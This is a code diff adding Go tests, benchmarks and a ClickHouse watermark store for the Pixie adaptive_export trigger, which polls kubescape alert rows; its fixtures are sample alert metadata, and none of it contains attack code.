+func TestTrigger_BadRowSkipped(t *testing.T) { + bad := `{"RuleID":"","RuntimeK8sDetails":"","RuntimeProcessDetails":"","event_time":"1","hostname":"node-1"}` + "\n" + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = w.Write([]byte(bad + canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm != "redis-server" { + t.Fatalf("got Comm %q; bad row leaked through", ev.Target.Comm) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("good row not received after bad-row skip") + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go new file mode 100644 index 00000000000..2924b2b4df7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go @@ -0,0 +1,142 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "crypto/sha256" + "encoding/hex" + "fmt" + "strings" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" +) + +// rowFingerprint is the deduper for boundary rows at each poll. It +// runs ONCE PER kubescape row pulled from ClickHouse by the trigger +// (clickhouse.go:272-273). With PollLimit=10000 and a 250ms ticker, a +// trigger that's catching up from a stale watermark can process 40k +// rows/sec PURELY in the fingerprint loop — every one of which: +// +// 1. Allocates a fresh sha256 hasher (sha256.New). +// 2. Runs fmt.Fprintf with %d/%s verbs into the hasher (uses reflect). +// 3. Hex-encodes the 32-byte digest into a 64-char string. +// +// The bench numbers below quantify that. If the per-row cost is +// significant, the trigger backlog drain itself is a CPU consumer +// independent of any downstream work. + +func benchKubescapeRow(i int) kubescape.Row { + // K8sDetails / ProcessDetails are JSON blobs in production — + // kubescape emits them at ~500 bytes typical, ~2KB upper. 
+ const k8sDetails = `{"podNamespace":"log4j-poc","podName":"backend-vulnerable-779cd9d765-mxr8t","containerName":"backend","workloadName":"backend-vulnerable","workloadKind":"Deployment","image":"ghcr.io/k8sstormcenter/log4j-chain-backend-vulnerable:latest","clusterName":"soc-demo-pg","nodeName":"node-1"}` + const procDetails = `{"comm":"java","pid":1234,"ppid":1,"path":"/usr/lib/jvm/java-11/bin/java","argv":["java","-cp","/app/log4j-vuln-1.0.jar","com.example.App"],"user":"appuser","cwd":"/app","spawn_time":"2026-06-07T18:00:00Z"}` + return kubescape.Row{ + EventTime: uint64(1_700_000_000_000_000_000 + i), + RuleID: "R1100", + Hostname: "pixie-worker-node", + K8sDetails: k8sDetails, + ProcessDetails: procDetails, + } +} + +func BenchmarkRowFingerprint(b *testing.B) { + row := benchKubescapeRow(0) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = rowFingerprint(row) + } +} + +// BenchmarkRowFingerprint_Unique varies event_time per call so the +// hasher gets unique input bytes (matches real boundary-row behaviour +// where each row has its own event_time). +func BenchmarkRowFingerprint_Unique(b *testing.B) { + rows := make([]kubescape.Row, 1024) + for i := range rows { + rows[i] = benchKubescapeRow(i) + } + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _ = rowFingerprint(rows[i%len(rows)]) + } +} + +// BenchmarkRowFingerprint_LargePoll simulates one trigger poll +// draining PollLimit=10000 rows — the boundary-dedup pass after a +// stale-watermark catchup. The trigger does this ONCE per +// PollInterval (250ms default) when there's a backlog; under a +// 100ms-jitter ticker drift this can run 4-10× per second. 
+func BenchmarkRowFingerprint_LargePoll(b *testing.B) { + const batch = 10_000 + rows := make([]kubescape.Row, batch) + for i := range rows { + rows[i] = benchKubescapeRow(i) + } + b.ReportAllocs() + b.ResetTimer() + for n := 0; n < b.N; n++ { + for i := range rows { + _ = rowFingerprint(rows[i]) + } + } +} + +// BenchmarkRowFingerprintSimple_LargePoll uses an alternative +// allocation-free fingerprint (sha256-of-concatenated-strings via a +// builder + direct Write). Lets us compare the current Fprintf-based +// implementation's reflect-driven cost against a hand-rolled version +// — informs whether replacing the fmt.Fprintf is a worthwhile +// micro-optimisation if the standard bench shows the trigger +// fingerprint as a CPU hotspot. +func BenchmarkRowFingerprintSimple_LargePoll(b *testing.B) { + const batch = 10_000 + rows := make([]kubescape.Row, batch) + for i := range rows { + rows[i] = benchKubescapeRow(i) + } + b.ReportAllocs() + b.ResetTimer() + for n := 0; n < b.N; n++ { + for i := range rows { + _ = fingerprintNoFmt(rows[i]) + } + } +} + +// fingerprintNoFmt is the Fprintf-free reference. Same output guarantee +// is NOT asserted here — this is a perf-comparison anchor only. If the +// numbers diverge by >2× from rowFingerprint, the fmt.Fprintf path is +// a real cost. 
+func fingerprintNoFmt(r kubescape.Row) string { + h := sha256.New() + var b strings.Builder + b.Grow(64 + len(r.RuleID) + len(r.Hostname) + len(r.K8sDetails) + len(r.ProcessDetails)) + _, _ = fmt.Fprintf(&b, "%d", r.EventTime) + b.WriteByte(0) + b.WriteString(r.RuleID) + b.WriteByte(0) + b.WriteString(r.Hostname) + b.WriteByte(0) + b.WriteString(r.K8sDetails) + b.WriteByte(0) + b.WriteString(r.ProcessDetails) + h.Write([]byte(b.String())) + return hex.EncodeToString(h.Sum(nil)) +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/integration_test.go b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go new file mode 100644 index 00000000000..c8a42f73575 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go @@ -0,0 +1,149 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package trigger_test + +import ( + "context" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// Live integration test for the trigger's poll loop. Inserts a +// kubescape_logs row directly via HTTP, then asserts the trigger +// surfaces it as a kubescape.Event before the deadline. 
+ +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +// insertKubescapeRow shoves one synthetic row into kubescape_logs via +// JSONEachRow on the HTTP interface — same shape Vector emits. +func insertKubescapeRow(t *testing.T, endpoint, user, pass, hostname, ruleID string, eventTime uint64) { + t.Helper() + body := fmt.Sprintf( + `{"BaseRuntimeMetadata":"{\"alertName\":\"%s\"}","CloudMetadata":"","RuleID":"%s","RuntimeK8sDetails":"{\"podName\":\"redis-test\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1234,\"comm\":\"redis-server\"}}","event":"","event_time":%d,"hostname":"%s"}`, + ruleID, ruleID, eventTime, hostname, + ) + q := url.Values{} + q.Set("query", "INSERT INTO forensic_db.kubescape_logs FORMAT JSONEachRow") + req, err := http.NewRequest(http.MethodPost, + strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), + strings.NewReader(body)) + if err != nil { + t.Fatal(err) + } + req.Header.Set("Content-Type", "application/x-ndjson") + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("seed insert: %v", err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + buf, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + t.Fatalf("seed insert HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(buf))) + } 
+} + +// TestTriggerSubscribe_Live: insert one row, expect one Event from the +// trigger's Subscribe channel within the deadline. +func TestTriggerSubscribe_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + hostname := fmt.Sprintf("aw-trig-%d", time.Now().UnixNano()) + now := time.Now() + eventTime := uint64(now.UnixNano()) + + // Use a watermark slightly before the synthetic event_time so the + // first poll picks up exactly our row, regardless of unrelated rows + // in the table from earlier runs. + cfg := trigger.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + Hostname: hostname, + PollInterval: 200 * time.Millisecond, + InitialWatermark: eventTime - 1, + } + trg, err := trigger.New(cfg) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + + ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + ch, err := trg.Subscribe(ctx) + if err != nil { + t.Fatalf("Subscribe: %v", err) + } + + insertKubescapeRow(t, endpoint, user, pass, hostname, "R1005", eventTime) + + select { + case ev, ok := <-ch: + if !ok { + t.Fatalf("channel closed before event arrived") + } + if ev.RuleID != "R1005" { + t.Errorf("Event.RuleID = %q, want R1005", ev.RuleID) + } + if ev.Hostname != hostname { + t.Errorf("Event.Hostname = %q, want %q", ev.Hostname, hostname) + } + if ev.EventTime != eventTime { + t.Errorf("Event.EventTime = %d, want %d", ev.EventTime, eventTime) + } + if ev.Target.Pod != "redis-test" || ev.Target.Namespace != "redis" { + t.Errorf("Event.Target = %+v, want pod=redis-test, ns=redis", ev.Target) + } + case <-ctx.Done(): + t.Fatalf("trigger did not surface the seeded row within 15s") + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark.go b/src/vizier/services/adaptive_export/internal/trigger/watermark.go new file mode 100644 index 00000000000..6d6d98daa87 --- /dev/null +++ 
b/src/vizier/services/adaptive_export/internal/trigger/watermark.go @@ -0,0 +1,127 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp" +) + +// WatermarkStore persists the trigger's per-(hostname,table) cursor +// across operator restarts. Without persistence, every restart on a +// busy node replays kubescape_logs from event_time=0 — multi-GiB +// single-shot SELECTs that the trigger's HTTP client times out on, +// pinning the watermark at 0 forever. +// +// Load returns (watermark, true, nil) when a row exists, or +// (0, false, nil) when no row exists yet (fresh cluster). An error +// returned from Load or Save is logged + non-fatal: the trigger falls +// back to whatever cold-start strategy the caller chose. +type WatermarkStore interface { + Load(ctx context.Context, hostname, table string) (uint64, bool, error) + Save(ctx context.Context, hostname, table string, watermark uint64) error +} + +// ClickHouseWatermarkStore is the production WatermarkStore — reads +// and writes forensic_db.trigger_watermark over the same HTTP endpoint +// as the rest of the operator. Schema is owned by the clickhouse +// package's Apply (CREATE TABLE IF NOT EXISTS at boot). 
+type ClickHouseWatermarkStore struct { + database string + c *chhttp.Client +} + +// NewClickHouseWatermarkStore defaults an empty database to forensic_db, +// rejects an invalid database identifier, and builds the chhttp client. +// timeout is handed to chhttp.New unchanged (timeout=0 → chhttp default). +func NewClickHouseWatermarkStore(endpoint, database, user, pass string, timeout time.Duration) (*ClickHouseWatermarkStore, error) { + if database == "" { + database = "forensic_db" + } + if !validIdentifier(database) { + return nil, fmt.Errorf("watermark: invalid database identifier %q", database) + } + c, err := chhttp.New(endpoint, user, pass, timeout) + if err != nil { + return nil, fmt.Errorf("watermark: %w", err) + } + return &ClickHouseWatermarkStore{database: database, c: c}, nil +} + +// Load returns the most-recent persisted watermark for (hostname, table). +// Uses FINAL — the table is ReplacingMergeTree, and per-(hostname,table) +// cardinality is one, so the cost is negligible. (0, false, nil) means +// no row exists for the key yet — the trigger's caller chooses cold-start. +func (s *ClickHouseWatermarkStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) { + body, err := s.c.Query(ctx, fmt.Sprintf( + "SELECT watermark FROM %s.trigger_watermark FINAL "+ + "WHERE hostname = %s AND table_name = %s LIMIT 1 FORMAT JSONEachRow", + s.database, quoteCH(hostname), quoteCH(table))) + if err != nil { + return 0, false, fmt.Errorf("watermark load: %w", err) + } + body = bytes.TrimSpace(body) + if len(body) == 0 { + return 0, false, nil + } + // JSONEachRow emits UInt64 quoted or as a bare number depending on + // output_format_json_quote_64bit_integers; values above 2^53 would lose + // precision through float64, so keep the raw token and parse it as uint64. 
+ var raw struct { + Watermark json.RawMessage `json:"watermark"` + } + if err := json.Unmarshal(bytes.Split(body, []byte{'\n'})[0], &raw); err != nil { + return 0, false, fmt.Errorf("watermark load: parse response: %w", err) + } + wm, err := parseUint64Loose(raw.Watermark) + if err != nil { + return 0, false, fmt.Errorf("watermark load: %w", err) + } + return wm, true, nil +} + +// Save inserts a new row. ReplacingMergeTree(updated_at) merges later; +// reads via FINAL always return the freshest. Write is fire-and-merge +// — no UPDATE semantics, no contention with concurrent INSERTs from +// other operator instances (each pins its own hostname). +func (s *ClickHouseWatermarkStore) Save(ctx context.Context, hostname, table string, watermark uint64) error { + row, err := json.Marshal(struct { + Hostname string `json:"hostname"` + TableName string `json:"table_name"` + Watermark uint64 `json:"watermark"` + UpdatedAt string `json:"updated_at"` + }{ + Hostname: hostname, + TableName: table, + Watermark: watermark, + UpdatedAt: time.Now().UTC().Format("2006-01-02 15:04:05.000000000"), // UTC, nanosecond precision + }) + if err != nil { + return err + } + if _, err := s.c.Insert(ctx, + fmt.Sprintf("INSERT INTO %s.trigger_watermark FORMAT JSONEachRow", s.database), + row, chhttp.InsertOptions{}); err != nil { + return fmt.Errorf("watermark save: %w", err) + } + return nil +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go new file mode 100644 index 00000000000..d0cf8aa818a --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go @@ -0,0 +1,313 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "context" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "sync/atomic" + "testing" + "time" +) + +// fakeStore is an in-memory WatermarkStore for trigger tests: Load replays the +// canned load* fields and Save records each watermark; no live ClickHouse needed. +type fakeStore struct { + mu sync.Mutex // held by Load, Save and savedCount + saves []uint64 // watermarks accepted by Save, in call order + loadResult uint64 // canned Load watermark + loadOK bool // canned Load "row exists" flag + loadErr error // canned Load error + saveErr error // when non-nil, Save returns it and records nothing +} + +func (f *fakeStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) { + f.mu.Lock() + defer f.mu.Unlock() + return f.loadResult, f.loadOK, f.loadErr // ctx, hostname and table are ignored +} + +func (f *fakeStore) Save(ctx context.Context, hostname, table string, wm uint64) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.saveErr != nil { + return f.saveErr + } + f.saves = append(f.saves, wm) + return nil +} + +func (f *fakeStore) savedCount() int { + f.mu.Lock() + defer f.mu.Unlock() + return len(f.saves) +} + +// TestTrigger_LoadsPersistentWatermarkOnBoot — the very first SELECT +// the trigger issues must filter event_time by the persisted watermark, +// not by InitialWatermark or 0. 
+func TestTrigger_LoadsPersistentWatermarkOnBoot(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + store := &fakeStore{loadResult: 1744000000000000000, loadOK: true} + tr, err := New(Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + Watermark: store, + // InitialWatermark deliberately set to a SMALLER value than + // the store's — the store's value must win. + InitialWatermark: 0, + }) + if err != nil { + t.Fatalf("New: %v", err) + } + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) // only the outgoing SQL is inspected; events and error are discarded + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: the SQL compares multiIf(...) >= <watermark> + // (event_time is auto-normalized to nanoseconds). 1.744e18 is already + // ns-scale so it passes through the multiIf unchanged. + if !strings.Contains(q, ") >= 1744000000000000000") { + t.Fatalf("first query did not use persisted watermark; got %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty — fresh cluster: +// the persistent table has no row for this host yet, trigger uses +// the configured InitialWatermark instead. 
+func TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + store := &fakeStore{loadOK: false} // no row present + tr, _ := New(Config{ // NOTE(review): New's error is discarded here, unlike in TestTrigger_LoadsPersistentWatermarkOnBoot + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + Watermark: store, + InitialWatermark: 42, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: InitialWatermark=42 is <1e10 so the + // multiIf treats it as seconds and multiplies by 1e9 → 42_000_000_000. + if !strings.Contains(q, ") >= 42000000000") { + t.Fatalf("first query did not use InitialWatermark fallback; got %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_FallsBackOnStoreLoadError — store unreachable on boot +// must not block the trigger from starting; it falls back to +// InitialWatermark and continues. +func TestTrigger_FallsBackOnStoreLoadError(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + store := &fakeStore{loadErr: fmt.Errorf("clickhouse unreachable")} + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + Watermark: store, + InitialWatermark: 7, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: InitialWatermark=7 is <1e10 so the + // multiIf treats it as seconds and multiplies by 1e9 → 7_000_000_000. 
+ if !strings.Contains(q, ") >= 7000000000") { + t.Fatalf("error path did not fall back to InitialWatermark; got %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_ThrottledWatermarkSave — successful advances are +// flushed at WatermarkSaveInterval cadence, not on every poll. The +// test asserts 0 < saves < polls on the fake store after 250ms. +func TestTrigger_ThrottledWatermarkSave(t *testing.T) { + const row1 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000001","hostname":"node-1"}` + const row2 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000002","hostname":"node-1"}` + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + if n%2 == 1 { // odd calls serve row1, even calls serve row2 + _, _ = w.Write([]byte(row1 + "\n")) + } else { + _, _ = w.Write([]byte(row2 + "\n")) + } + })) + defer srv.Close() + + store := &fakeStore{loadOK: false} + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 10 * time.Millisecond, + Watermark: store, + WatermarkSaveInterval: 100 * time.Millisecond, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + go func() { + for range ch { + } + }() + + time.Sleep(250 * time.Millisecond) // up to ~25 polls at 10ms, ~2 save intervals at 100ms + saves := store.savedCount() + pollCalls := int(atomic.LoadInt64(&calls)) + if pollCalls < 10 { + t.Fatalf("expected many polls in 250ms; got %d", pollCalls) + } + if saves >= pollCalls { + t.Fatalf("saves not throttled: %d saves vs %d polls", saves, pollCalls) + } + if saves == 0 { + t.Fatalf("no watermark saves at all in 250ms with active rows") + } +} 
+ +// TestTrigger_LimitsRowsPerPoll — every query carries LIMIT N so +// catch-up after a stale watermark doesn't translate into one giant +// scan that times out. +func TestTrigger_LimitsRowsPerPoll(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + PollLimit: 250, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) + select { + case q := <-queries: + if !strings.Contains(q, "LIMIT 250") { + t.Fatalf("query missing LIMIT clause: %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_PartialBodyReadStillAdvances — server emits one +// well-formed line then closes the connection mid-second-line. The +// trigger must still emit the first event AND advance its watermark +// so the next poll picks up from there, instead of looping forever +// on the same start watermark. +func TestTrigger_PartialBodyReadStillAdvances(t *testing.T) { + const goodLine = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"5000","hostname":"node-1"}` + queries := make(chan string, 256) + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + n := atomic.AddInt64(&calls, 1) + if n == 1 { + // Hijack the conn and cut the body mid-line, as when CH is streaming and the + // HTTP timeout fires. Errorf+return: Fatalf must not run off the test goroutine. 
+ hj, ok := w.(http.Hijacker) + if !ok { + t.Errorf("ResponseWriter does not support Hijack") + return + } + conn, bufrw, err := hj.Hijack() + if err != nil { + t.Errorf("Hijack: %v", err) + return + } + _, _ = io.WriteString(bufrw, "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain; charset=utf-8\r\n\r\n") + _, _ = io.WriteString(bufrw, goodLine+"\n") + _, _ = io.WriteString(bufrw, "{\"RuleID\":\"R2\",\"Runtime") + _ = bufrw.Flush() + _ = conn.Close() + return + } + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + + select { + case ev := <-ch: + if ev.Target.PID != 1 { + t.Fatalf("first event PID = %d, want 1", ev.Target.PID) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first event from partial body") + } + + // First poll's query went to queries; drain it then wait for the second + // poll and assert the watermark advanced past 0. + <-queries + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: the good line emits event_time="5000" + // (seconds); the advanced watermark goes through the multiIf with the + // sec→ns multiplier (× 1e9) → 5_000_000_000_000. + if !strings.Contains(q, ") >= 5000000000000") { + t.Fatalf("watermark did not advance on partial read; second query: %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for second poll") + } +}